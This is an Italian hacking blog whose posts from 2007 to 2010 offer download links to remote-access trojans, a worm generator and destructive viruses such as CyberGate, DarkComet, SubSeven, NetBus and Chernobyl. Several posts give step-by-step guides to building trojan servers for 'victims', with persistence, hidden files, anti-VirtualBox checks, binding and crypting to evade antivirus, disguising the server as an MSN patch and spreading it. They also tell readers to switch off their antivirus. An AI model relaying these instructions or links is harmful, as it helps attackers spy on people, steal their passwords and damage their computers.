HacKeR.iT

CyberGate 1.4.8 - Remote Administration Tool

2010-04-08T15:19:00.019+02:00

CyberGate è un potente RAT (Remote Administration Tool) che funziona su tutti i sistemi operativi Windows, che viene continuamente sviluppato dal team di Cyber-Sec.org
CyberGate è stato costruito per essere uno strumento utile per chi ha necessità di gestire spesso computer remoti.
CyberGate è leggero, portatile e di facile utilizzo ed è attualmente considerato uno dei migliori software per il controllo remoto...
La Release 1.4.8 è una versione migliorata della 1.4 Private Edition, rilasciata pubblicamente dopo che quest'ultima è stata crakkata da alcuni hacker...
[DOWNLOAD]
LINK VERIFICATO: (Consigliato) [Cos'è?]
Password: hackeritalia.blogspot.com
http://sharecash.org/download.php?file=599015
LINK NON VERIFICATO: (NON SICURO)
n.d.

[/DOWNLOAD]

[+] FEATURES LIST :
- Connessione Inversa
- Traffico Crittografato 64 bit
- Supporto multi-porte
- Binder
- Icon Changer
- Supporto Salvataggio log su server FTP
- Automatic DNS updater
- UAC (Vista and Seven protection) bypass
- Keylogger
- Password recovery tool (browser, msn, windows...)
- Chat feature
- File manager
- Registry editor
- Services manager
- Windows manager
- Processes manager
- Clipboard manager
- Socks 4/5 Proxy
- Http Proxy
- Desktop remoto
- Visualizza webcam remota
- Cattura audio
- Download Remoto e Esecuzione Remota
- DOS prompt
- Invia Messaggi
- Lista Porte Attive
- Remote open HTTP url
- CD Apri e Chiudi
- Remote Power Options (Shutdown, Restart, etc)
- Remote Mouse Lock
- Remote Keyboard Lock
- Remote Icons Hide/show
- Remote Start Hide/show
- multi-user keylloger/file search;

DarkComet 2.0 RC4 - RAT

2010-03-31T12:19:00.016+02:00

DarkComet-RAT (Remote Administration Tool) è un potente e stabile RAT(Remote administration Tool) che ti permette di controllare computer remoti in modo semplice e veloce , puoi vedere il desktop, la webcam, controllare i processi remoti, ascoltare i suoni etc... allo stesso tempo e con una velocità elevata , DarkComet può lavorare in LAN ( Local Area Network ) e WAN ( Wide Area Network ) .
DarkComet è compatibile con Windows 2000 , Windows XP (all sp), Windows Vista (all sp) and Windows Seven, sia 32(.386) che 64 bit .

[DOWNLOAD]
LINK VERIFICATO: (Consigliato) [Cos'è?]
Password: hackeritalia.blogspot.com
http://sharecash.org/download.php?file=562957

LINK NON VERIFICATO: (NON SICURO)
n.d.

[/DOWNLOAD]

Caratteristiche: (Features)
-SYSTEM INFO (informazioni sul pc-vittima)
-FUN FUNCTIONS (funzioni divertenti)
-SYSTEM FUNCTIONS:
-Process Manager; (modifica i processi remoti)
-Remote Registry; (cambia i valori del registro di windows)
-Remote Shell; (invia comandi al pc)-Window Functions (controlla le finestre attive)
-Unistall Applications (Disinstalla i software del pc remoto)
-Remote MSConfig (Cambia le impostazioni di avvio)
-Remote Scripting (Esegui script in vari linguaggi nel pc remoto)
-Files Functions (File Manager[Upload/Download] e Search Manager)
-Password (Visualizza le password di MSN,Firefox,IE7 ed i log di utorrent)
-Msn Functions (Controlla MSN e visualizza i contatti)
-Spy Functions (Controlla Webcam e Suoni, Controlla il Desktop, Keylogger ONline/OFFline)
-Network Functions (Url Download, visualizzazione remota delle pagine web, redirect)
-Misc Functions (Controlla stampante, messaggi)-Quick Actions (varie funzioni di controllo remoto)
-Log(log della sessione)
-Other
GUIDA: (i link contengono un breve pagina pubblicitaria)
Requisiti:
1. Un account no-ip e scarica NO-IP DUC... Se non ne hai uno crealo segui questa guida: Crea account No-ip

2. Scarica Simple Port Forwarding ed apri la porta 1604 sul tuo router.(se non dovesse funzionare prova a cambiarla manualmente dalla pagina 192.168.1.1[la pagina potrebbe essere diversa]).
-----------------------------------------------------------------------------------------------
[in alcuni casi potrebbe essere necessario disattivare temporaneamente l'antivirus per poter utilizzare il programma]

1.) Scarica Darkcomet 2.0 dal link presente nel post
2.)Scompatta l'archivio e apri il programma . Si dovrebbe aprire un disclaimer:
- spunta la casella "Do not show again" e clicca "I Agree"
3)Ora dobbiamo configurare il RAT in modo che ascolti una determinata porta:
-Clicca "Connection">"Add Socket" ; dovrebbe aprirsi una finestra simile a questa:

4) Lascia le impostazioni come sono e clicca "Listen"
5)Adesso dobbiamo creare il server:
1- Clicca "Edit Server" e dovrebbe apparire una finestra con varie impostazioni:
2-"Edit Server Session": lascia così che serve solo se hai già creato almeno una configurazione...
3-"Main Setting"....
- "Mutex Name": " Clicca Random"
- "Server ID": Scegli un nome da dare alle tue vittime ;-)
- "Protect server connection by password": se vuoi impostare una password per accedere ai pc remoti > non impostarla almeno che tu non abbia un account condiviso.
-"Random Range Instance": Lascia i valori predefiniti...
-"Edit Server Methode":
-EOF "Stabile ma è difficile trovare un buon crypter per criptarlo"
-RES "Tutti i crypter funzionano utilizzando questo metodo" [CONSIGLIATO]
4) Connection Setting:
- Nel campo "IP Address" metti il tuo no-ip (ex: example.no-ip.org)
- Nel campo "Port" lascia la porta di default
5)Server Startup:
Seleziona tutto ("Melt Server" = facoltativo[cancella il file dopo aver installato il server])...
e cambia i valori in questi campi:
-Installation Path: Scegli dove vuoi installare il server
-Intall in Registry Startup: installa il server nel registro di windows
-Install in Windows Services: installa il server come servizio di sistema
-Install with ActiveX Startup: installa il server come ActiveX (clicca Random)
6)Server Shield:
-File Attribute e Parent Folder Attribute: Hidden, System, Read Only.
-Disable Functions: disabilita detrminate funzioni nel pc remoto ;-)
- Spunta la casella Hide Partialy Process
7) Anti VirtualBox:
Spunta la casella "Active Anti VirtualBox" e "Fake Run"
8)Icon Setting: se vuoi cambiare icona al server
9)Generate Server: Spunta le caselle "Active Offline Keylogger at server startup" e "I Accept the DarkComet-RAT EULA" poi clicca "Create Server".

Ok, finalmente puoi iniziare a diffondere il tuo trojan(RAT)... ;-)
ti consiglio di criptarlo e unirlo ad altri file per renderlo invisibile agli anti-virus:
Per trovare il programma adatto cerca con Google "FUD Binder" e "FUD Crypter"
Puoi controllare quanti antivirus individuano il tuo virus SOLO QUI: Novirusthanks.org
[IMPORTANTE: Prima di cliccare "Submit File" spunta la casella "Do not distribute the sample"]

Divertiti !!! ;-)
Guida Scritta Da iBlack, se vuoi pubblicare questa guida posta un link a questo Blog

LINK VERIFICATO!!!

2010-03-31T11:29:00.007+02:00

Da oggi i programmi pubblicati in questo blog potranno essere scaricati in due modi differenti:
LINK VERIFICATO: (SareCash.Org)
I file scaricabili da questi link sono verificati e non contengono virus...
Vengono controllati usando vari servizi(Sandboxie, NoVirusThanks.org, Anubis...)
Alcuni di questi file possono essere segnalati come hacktool o #codice_trj#/gen in quanto permettono azioni (ad esempio il controllo remoto di un pc) che nella maggior parte dei paesi non sono legali...
I link verificati sono ospitati presso sharecash.org per scaricare i software bisogna iscriversi ad uno dei vari sponsor... Gli sponsor sono completamente gratuiti e rapidi inoltre ci permettono di mantere una buona qualità del servizio.
LINK NON VERIFICATO: (alcune volte questi link non sono disponibili - n.d.)
I file scaricabili in questi link non sono verificati e potrebbero essere pericolosi...
Questi download sono insicuri e potrebbero non essere sempre disponibili...
Ti consigliamo di scaricare i file dai link verificati.

VBS Worm Generator 2 Beta

2009-10-30T16:17:00.007+01:00

L'ultima versione disponibile di uno dei più famosi generatori di virus attualmente in circolazione.
Interfaccia grafica semplice ed intuitiva, questa versione risale a qualche anno fà ma rimane molto affidabile e piena di opzioni.

DOWNLOAD: CLICCA QUI!
PASSWORD: hackeritalia.blogspot.com

GUIDA:

Aperto il progamma inserite le informazioni principali, quali il nome del vostro virus ("Worm name:"), il nome del creatore ("Your name:"), il nome del file contenente il virus ("File name:") e in che cartella sarà salvato il virus ("Copy worm to:").

Opzioni:

* Startup: Decidete se il virus dovrà avviarsi con l'avvio di Windows e che nome dovrà avere nel registro.

* E-Mail: Decidete se il virus si dovrà replicare con la posta elettronica, potete anche scrivere il messaggio dell'E-Mail.

* IRC: Qui è possibile decidere se il virus dovrà infettare i computer attraverso il programma di messaggistica istantanea "mIRC".

* Infect: qui è possibile decidere quali file dovrà infettare il virus.

* Payload: Qui è possibile decidere se inserire "runtime" che permettono di aggiungere altre funzioni al virus oltre all'infezione del sistema.

* Extras: - Antideletion: decidere se il virus deve essere "stealth".

- Encryption: decidere se il virus deve essere criptato.

- Join exe: per unire un file .exe.

Una volta personalizzato il virus clicchiamo su "generate" e scegliamo una cartella dove salvare il file.

Hacker.It Riparte !!!

2009-10-29T19:14:00.005+01:00

Dopo circa 2 anni in cui non sono stati pubblicati nuovi post, a causa di alcune controversie legali con la società Blogger.com che avevano portato all'interruzione del servizio per alcuni mesi durante gli anni 2007-2008-2009, mi è stato finalmente riabilitato l'accesso all'account.

Probabilmente dopo quasi 3 anni alcuni link non saranno più funzionanti e alcuni programmi o guide saranno ormai obsolete... ho deciso quindi che dal 1 Novembre 2009 il blog riprenderà ad aggiornare ed aumentare i programmi disponibili per dare la possibilità a tutti di "usarli" a proprio rischio e pericolo.

Chiunque può partecipare all'ampliamento del blog inviando una mail a: hacker.it@live.it
Allegate alla mail il file del programma (compresso in un archivio .zip), più una breve descrizione del software.

Nota Importante:
hackeritalia.blogspot.com declina ogni responsabilità sull'utilizzo dei software segnalati nel sito e ricorda agli utenti che qualsiasi utilizzo dei suddetti programmi volto a recare danno a soggetti o a sistemi informatici,è perseguibile penalmente dalla legge italiana.

Non voglio altri problemi :)

Actual Keylogger 3.0

2007-10-23T20:58:00.001+02:00

Un semplice Keylogger che permette di sapere tutto quello che è stato premuto nella tastiera.

Per accedere alle registrazioni bisogna avere una password quindi solo voi potrete controllare ciò che è stato digitato sulla tastiera.

Non è un gran Keylogger ma è semplice e intuitivo,quindi facile da usare.

DOWNLOAD

ANARCHY

2007-10-23T20:38:00.001+02:00

Un virus poco conosciuto,abbastanza potente però.

Chiudete l'antivirus prima di scaricarlo altrimenti non riuscirete a scaricare il file

DOWNLOAD

CASINO

2007-10-23T19:41:00.000+02:00

CASINO è un virus che il 15 di ogni mese esegue un programma in cui compare una slot machine

La vittima se non fà Jackpot si ritrova l'hardisck formattato.

Per scaricare il software disattivate l'antivirus
DOWNLOAD

BACK ORIFICE 2000

2007-10-23T19:30:00.006+02:00

donwload:
Back Orifice 2000 v1.1 (Last) (523 kB)

Sviluppato dal team Coult of dead cow B.O2k (tradotto "Buco del culo") ha:
informazione del sistema, file system / processi / registro / network / multimedia / packet control; integrated packet sniffer; http server; plugin interface… molto difficile da usare.
E' un file .exe autoestraente.

A differenza degli altri trojan più diffusi, i comandi di B.O, vengono riportati in una finestra a parte, che appare quando si specifica con che server ci si vuole connettere; all'interno di questa finestra sono organizzati come un menu ad albero.
- Simple: Contiene ping e query.
- System: Da questo menu è possibile resettare la macchina remota, bloccarla, ottenere una lista di password e delle informazioni sul PC (remoto).
- Key logging: Gestisce un keylogger, che permette di sapere quali tasti sono stati premuti (quindi anche le password non salvate).
- GUI: Manda i messagebox.
- TCP/IP: Alcune informazioni sulle comunicazioni remote, apre un server HTTP e gestisce le porte aperte.
- Process control: Permette di gestire tutti i processi della macchina remota.
- Registry: Modifica il registro di configurazione.
- Multimedia: Cattura immagini ed esegue file sonori (solo wav).
- File/Directory: Con questi comandi è possibile gestire file e cartelle, permette anche di modificare gli attributi.
- Compression: Comprime e decomprime file.
- DNS: Traduce un Hostname in indirizzo IP numerico e viceversa.
- Server control: Controlla e gestisce il server remoto.- Legacy buttplugs: Aggiorna il server tramite dei plugin.

Chernobyl

2007-10-22T21:47:00.001+02:00

Virus micidiale se riuscite a farlo aprire alla vittima sovracaricherà la cpu rovinando definitivamente il pc.

MANEGGIATOLO CON CURA.

DOWNLOAD

Non sono responsabile dell'uso che ne farete.

SUBSEVEN 2.2

2007-10-22T20:51:00.008+02:00

Ultima versione di questo famoso Trojan che permette l’upload e il download dei file dalla macchina infetta, permette di agire sul filesystem come meglio si crede, l’esecuzione di programmi, la cattura di screanshot del desktop, il log di tutti i tasti premuti, la cancellazione di interi hard-disk ecc…Attualmente sono conusciute undici versioni diverse, ciascuna con un proprio sistema di infezione ma con funzioni similari.

DOWNLOAD VERIFICATO: (Consigliato) [Cos'è?]
Password ("tiranno")
http://sharecash.org/download.php?file=604913

DOWNLOAD NON VERIFICATO:
n.d

GUIDA
Dopo aver estratto i file, mi raccomando di disattivare l’antivirus durante l’uso altrimenti non riuscirete a lavorare. Partiamo con creare un server che poi dovrà essere inviato alla vittima, miraccomando di non aprire il server sul vostro PC se non sapete quello che state facendo. Per creare un server dobbiamo usare EDIT SERVER.EXE, si aprirà una finesta con due bottoni:
-Run Normal Mode
-Run Advanced Mode
La prima va bene, adesso ci sono 8 menu sulla sinistra:
Server Settings
Potete settare il nome della vittima, il numero di porta, il nome del server, vi consiglio di spuntare “melt server after installation”, serve per nascondere il server avvenuta l’installazione.
Startup methods
Potete settare il metodo di avvio del server sulla macchina, spuntate le prime quattro opzioni.
Notifications
Settate il metodo di notifica, via ICQ, via e-mail, via Mirc, non appena la vittima si collegherà vi arriverà un messaggio col numero IP della macchina.
Blinded Files
Per camuffare l’exe del server è possibile unirlo ad un altro exe.
Plugins
I plugins si possono inserire anche dopo essere collegati alla vittima e servono per il completo funzionamento di SubSeven.
Restrictions
Le restrizioni per il controllo di subseven, potete settarle in questo menu.
E-mail
In questo menù potete inserire la vostra mail dove riceverete messaggi di posta contenenti informazioni segrete e riservate come password.
Exe icon/other
Affinchè la vittima non si insospettisca potete cambiare l’icona del server, potete anche settare un messaggio di errore che spunterà subito dopo l’esecuzione del server, il vantaggio è che potete personalizzarlo come meglio credete, facendo passare il prog anche per una patch di MSN.Dopo aver eseguito tutti questi passaggi, per salvare il server, cliccare su “save as…” e scrivere il nome del file.

Adesso possiamo passare al lato Client di SubSeven, dopo aver aperto il client vi apparirà una finestrella con 9 menù:
Shortcuts
E’ il client in versione essenziale, tutte le funzioni sintetizzate.
Connection
Permette di conoscere il pc della vittima, informazioni su di essa, ed è possibile cambiare anche delle impostazioni del server come ad esempio la password, la porta e tante altre cose…
- Connect commands ci permette di gestire tutte le connessioni.
- Scanner fa una scansione nella rete e permette di trovare macchine con SubSeven Server.
Keys/messages
E’ possibile aprire una finestra sul PC della vittima con la funzione “matrix”, così potete chattare con la vittima, con la funzione “msg manager” potete creare messaggi di errore da inviare alla vittima, “spy manager” permette di visualizzare i messaggi della vittima, con la funzione “icq takeover” è possibile prendere il controllo di ICQ.
-Keyboard ci rende possibile attivare e disattivare la tastiera, il keylogger ci visualizza tutti i tasti premuti dalla vittima.
Advanced
“Registry editor” permette di aprire l’editor di registro, “Ftp Server” ci apre la porta 21 ed è possibile collegarsi come un server ftp, “App redirect” può farci eseguire delle applicazioni sul PC della vittima, “Process Manager” ci fa visualizzare tutti i processi sulla macchina infetta, “Netstat” mostre le connessioni attive, “Port redirect” fa si che i dati su una certa porta vengano reindirizzati su un altro indirizzo IP a scelta.
-Find files ci fa fare una ricerca di qualsiasi file presente sulla macchina infetta e “Show found files” mostra i file trovati.-Packet Sniffer è un semplice sniffer di pacchetti-Password ci fa visualizzare tutte le password del PC.
Miscellaneous
La funzione “file manager” serve a controllare l’hard disk, cancellare, scaricare sul nostro PC tutti i dati che ci interessano, “windows manager” permette di vedere tutte le finestre aperte, “text-2speack” per far chiacchierare il PC, “clipboard manager” per guardare tutti gli appunti della nostra vittima e infine “print manager”, se la stampante è accesa possiamo divertirci a stampare tutto quello che vogliamo. [ROFL]
Fun manager
Per vedere lo scermo della vittima usiamo “sceen capture”, se invece vogliamo vedere il viso della vittima “webcam”, per capovolgere lo schermo “flip screan”, per aprire un indirizzo web nel browser “open browser”, “resolution” per decidere la risoluzione, “windows color” per cambiargli i colori, volete giocare a TRIS con la vittima bene usate la funzione “tic-tac-toe”.
Fun other
Volete riavviargli il picci usate “restart computer”, “mouse” e il suo mouse diventa vostro, “volume setting” per cambiare i settaggi audio, potete registrare audio dal suo microfono con “record mic”e tante altre cosette carine…
Plugins
Ci permette di controllare i plugins
Local Option
Vari settaggi per cambiare il vostro client, se non volete lasciare tracce potete utilizzare un proxy.
Advanced
Qua possiamo disporre di uno script editor e di una lista di funzioni per tutti gli script.

NETBUS 1.70(o 170)

2007-10-22T20:27:00.011+02:00

NetBus è il software più usato dagli apprendisti hackers. Essendo un programma client-server si divide in due file che vanno eseguiti uno sul server (vittima) e uno sul client (hacker). NetBus è sicuramente un software che si può utilizzare anche senza avere troppe conoscenze informatiche.

--DOWNLOAD VERIFICATO--
La password dell'archivio zip è "tiranno".

--DOWNLOAD NON VERIFICATO (n.d)--

Info avanzate:
NETBUS è un programma di BACKDOOR, grazie a questo programma l'hacker può teleguidare il vostro computer.E' molto più evoluto di Back Orifice e ha una interfaccia molto più semplice.Bisogna solo conoscere l'indirizzo IP del computer da colpire (non è difficile ottenerlo), stabilire la connessione e permere i pulsanti del programma client (quello dell'hacker) come Open CD-ROM che fa aprire e chiudere il cassettino del CD-ROM del server remoto (la vittima) e moltissimi altri comandi intuitivi.Ciò che lo rende più evoluto degli altri programmi di back door è la possibilità di fare la scansione automatica degli indirizzi IP, in questo modo l'hacker non deve inserire sequenzialmente ogni indirizzo IP ma sarà il programma stesso a farne la scansione. In più c'è la possibilità di avere più hackers che piratano in simultanea una stessa vittima.

Istruzioni per l'uso di Netbus:
Il programma comprende due file entrambi forniti con un Trojan: il lato client (NETBUS.EXE) e il lato server (PATCH.EXE).Il lato server è il file con dimensione minore ed è il file che infetta il computer del malcapitato; deve essere eseguito sul PC della vittima; il nome del file è PATCH.EXE (ma il nome può essere modificato a proprio piacimento); il programma è difficilmente visibile e si carica anche dopo successivi riavvii del computer.Il lato client è il file che usa l'hacker per spiare (o distruggere) la vittima; ha un interfaccia semplicissima a pulsanti; bisogna solo inserire l'indirizzo IP del computer infetto e premere "Connect!" per stabilire la connessione.Se non si conosce l'indirizzo IP della vittima si può fare la scansione di un certo range di indirizzi:Con NetBus 1.70 basta inserire nel campo "host name/IP" xxx.xxx.xxx.0+255 (dove xxx è un numero compreso tra 0 e 255) e premere "Scan!"; in questo modo Netbus controllerà gli indirizzi da xxx.xxx.xxx.0 a xxx.xxx.xxx.255.

P.S: Di NetBus sono state pubblicate anche le versioni 2.0Pro e 2.1Pro ma sono shareware è quindi vi consiglio di scaricare la versione 1.7 .